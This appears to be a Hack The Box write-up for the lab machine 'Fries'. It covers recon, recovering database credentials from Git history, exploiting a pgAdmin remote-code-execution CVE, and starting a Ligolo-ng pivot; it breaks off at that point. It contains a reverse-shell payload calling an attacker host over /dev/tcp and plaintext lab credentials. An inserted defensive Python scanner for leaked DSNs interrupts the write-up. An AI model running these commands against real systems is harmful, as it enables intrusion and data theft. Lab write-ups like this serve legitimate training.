Hack The Box - Season 9 HTB Fries Writeup - HARD - Weekly - November 22nd, 2025
Fries - HackTheBox Writeup
Machine Information
- Difficulty: Hard
- Operating System: Windows Server 2022 (Domain Controller) + Ubuntu (Web Server)
- Domain: fries.htb
Initial Setup
Hosts Configuration
Add the following entries to /etc/hosts:
echo "$TARGET_IP fries.htb DC01.fries.htb code.fries.htb db-mgmt05.fries.htb" | sudo tee -a /etc/hosts
Reconnaissance
Nmap Scan
Full port scan to identify open services:
sudo nmap -A -sC -sS -v -p- --min-rate=1000 $TARGET_IP -oN nmap_full.txt
Key Findings:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu
53/tcp open domain Simple DNS Plus
80/tcp open http nginx 1.18.0 (Ubuntu)
88/tcp open kerberos-sec Microsoft Windows Kerberos
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP
443/tcp open ssl/http nginx 1.18.0 (Ubuntu)
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap
3268/tcp open ldap Microsoft Windows Active Directory LDAP
3269/tcp open ssl/ldap
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (WinRM)
9389/tcp open mc-nmf .NET Message Framing
Environment Details:
- Domain: fries.htb
- Domain Controller: DC01.fries.htb
- Certificate Authority: fries-DC01-CA
Subdomain Enumeration
ffuf -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt \
-u http://$TARGET_IP \
-H "Host: FUZZ.fries.htb" \
-mc 200
Discovered Subdomains:
- code.fries.htb - Gitea instance
- db-mgmt05.fries.htb - pgAdmin interface
- https://fries.htb - Password Management portal
Web Application Enumeration
Gitea Instance (code.fries.htb)
Accessing http://code.fries.htb reveals a Gitea repository hosting application code.
Key Intelligence from Repository:
- Flask application with PostgreSQL backend
- Database management interface at db-mgmt05.fries.htb
- Database name: ps_db
- Key personnel: Dylan, Mike, Dale (infrastructure access)
- Contact: d.cooper@fries.htb
Git History Analysis
Searching through Git history reveals sensitive credentials:
git clone http://code.fries.htb/fries/fries-app.git
cd fries-app
git log -p --all | grep -i "postgresql\|postgres\|database_url\|sqlalchemy" -B 5 -A 5
Credentials Found:
DATABASE_URL=postgresql://root:PsqLR00tpaSS11@172.18.0.3:5432/ps_db
SECRET_KEY=[REDACTED]
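The credentials above were committed once and stay recoverable from history even after a later commit removes them. As a defensive counterpart, added here as an example that is not part of this writeup or of the fries-app project, the following scanner walks `git log -p --all` output, flags connection strings carrying an embedded password on any added or removed line, and masks the secret in its report. The sample log, commit ids and values are constructed.

```python
import re

# Constructed sample of `git log -p --all` output (hypothetical commits and values).
SAMPLE_LOG = """\
commit 2222222222222222222222222222222222222222
    stop hardcoding the database url
diff --git a/.env b/.env
--- a/.env
+++ b/.env
@@ -1 +1 @@
-DATABASE_URL=postgresql://appuser:ExamplePass123@10.0.0.5:5432/ps_db
+DATABASE_URL=${DATABASE_URL}
commit 1111111111111111111111111111111111111111
    add env file
diff --git a/.env b/.env
--- /dev/null
+++ b/.env
@@ -0,0 +1 @@
+DATABASE_URL=postgresql://appuser:ExamplePass123@10.0.0.5:5432/ps_db
"""

COMMIT_RE = re.compile(r"^commit ([0-9a-f]{7,40})")
# URL-style DSN with an embedded password: scheme://user:secret@host[:port][/db]
DSN_RE = re.compile(
    r"(?P<scheme>postgres(?:ql)?|mysql|mongodb|redis)://"
    r"(?P<user>[^:/@\s]+):(?P<secret>[^@\s]+)@"
    r"(?P<host>[^/\s:]+)(?::(?P<port>\d+))?(?:/(?P<db>[^\s?#]*))?"
)

def scan_git_log(log_text: str) -> list[dict]:
    """Flag DSNs with passwords on any +/- diff line; '-' lines are still in history."""
    findings, commit = [], "unknown"
    for line in log_text.splitlines():
        m = COMMIT_RE.match(line)
        if m:
            commit = m.group(1)
            continue
        # Only diff content lines; skip the '---'/'+++' file headers and context lines
        if not line or line[0] not in "+-" or line.startswith(("+++", "---")):
            continue
        for d in DSN_RE.finditer(line):
            findings.append({
                "commit": commit, "change": line[0], "user": d.group("user"),
                "host": d.group("host"), "db": d.group("db") or "",
                "redacted": d.group(0).replace(d.group("secret"), "***"),
            })
    return findings
```

Run it against real output with `git log -p --all | python3 scanner.py` style piping by reading `sys.stdin` instead of SAMPLE_LOG; any hit in a `-` line means the secret must be rotated, not just deleted.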
pgAdmin Interface (db-mgmt05.fries.htb)
The subdomain hosts pgAdmin 9.1, which is vulnerable to CVE-2025-2945 (Remote Code Execution).
Login Credentials (from Gitea repository):
Username: d.cooper@fries.htb
Password: D4LE11maan!!
Exploitation - Initial Access
CVE-2025-2945 - pgAdmin RCE
# Clone exploit
git clone https://github.com/Cycloctane/cve-2025-2945-poc.git
cd cve-2025-2945-poc
#start nc
nc -lvnp 4444
# Execute exploit
python3 exp.py \
--target-url http://db-mgmt05.fries.htb \
--username d.cooper@fries.htb \
--password 'D4LE11maan!!' \
--db-user root \
--db-pass 'PsqLR00tpaSS11' \
--db-name ps_db \
--payload "__import__('os').system('bash -c \"bash -i >& /dev/tcp/$ATTACKER_IP/4444 0>&1\"')"
Result: Shell as pgadmin user inside Docker container
Post-Exploitation - Docker Container
Network Pivoting with Ligolo-ng
To access the internal Docker network and pivot further:
# Download Ligolo-ng
wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.8.2/ligolo-ng_proxy_0.8.2_linux_amd64.tar.gz
wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.8.2/ligolo-ng_agent_0.8.2_linux_amd64.tar.gz
# Extract
tar -xzf ligolo-ng_proxy_0.8.2_linux_amd64.tar.gz
tar -xzf ligolo-ng_agent_0.8.2_linux_amd64.tar.gz
# Create TUN interface
sudo ip tuntap add user $(whoami) mode tun ligolo
sudo ip link set ligolo up
# Start proxy
./proxy -selfcert -laddr 0.0.0.0:11601